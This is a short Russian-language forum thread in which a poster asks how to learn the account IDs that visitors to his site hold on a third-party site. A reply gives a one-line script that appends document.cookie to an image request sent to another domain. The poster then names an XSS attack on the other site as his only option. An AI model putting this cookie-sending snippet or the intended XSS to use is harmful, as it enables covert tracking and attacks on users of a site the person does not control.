подскажите по кроссдоменным фреймам\js

Тема в разделе "Другие языки", создана пользователем sergioFerro, 17 май 2010.

Статус темы:
Закрыта.
Модераторы: Цукер
  1. sergioFerro

    sergioFerro Писатель

    Регистр.:
    11 май 2008
    Сообщения:
    7
    Симпатии:
    0
    Ввиду того что мало сообщений пишу на форуме запостить в другую часть форума не могу.

    1. И так, есть сайт - domain.com, на него идет траф который зареган на сайте domain2.com
    2. 80% пользователей залогинены с кукизами неумираемыми. Т.е. долгосрочными. И при попадении на сайт domain2.com происходит редирект на их страницу с айди - предназначенный только им.

    Цель: вычислить айдишники людей которые зареганных на domain2.com
    т.е. domain2.com/userXXXXX заходящих на сайт domain.com

    Пробовал следующее:

    1. создавал iframe на domain.com с src=domain2.com и пытался получить доступ к его элеменатм - iframe.contentWindow.location.href результат - permission denied
    2. разные манипуляции с iframe - не даавали никаких положительных результатов.

    Никто не сталкивался с такими задачами?
     
  2. zardoz

    zardoz Постоялец

    Регистр.:
    6 май 2008
    Сообщения:
    84
    Симпатии:
    59
    Может попробовать использовать картинку вместо фрейма?

    В странице www.domain1.ru:
    HTML:
    
    <sсriрt>img = new Image(); img.src = "http://www.domain2.ru/counter.php?"+document.cookie;</sсriрt>
    А на domain2.ru создать counter.php, который анализировал куки и считал бы траффик
     
    sergioFerro нравится это.
  3. sergioFerro

    sergioFerro Писатель

    Регистр.:
    11 май 2008
    Сообщения:
    7
    Симпатии:
    0
    к сожалению в этом то и фишка что на domain2.com я не могу ничего создавать...

    вижу тока один выход - xss отака на domain2.com ...

    но все равно спасибо за ответ
     
Статус темы:
Закрыта.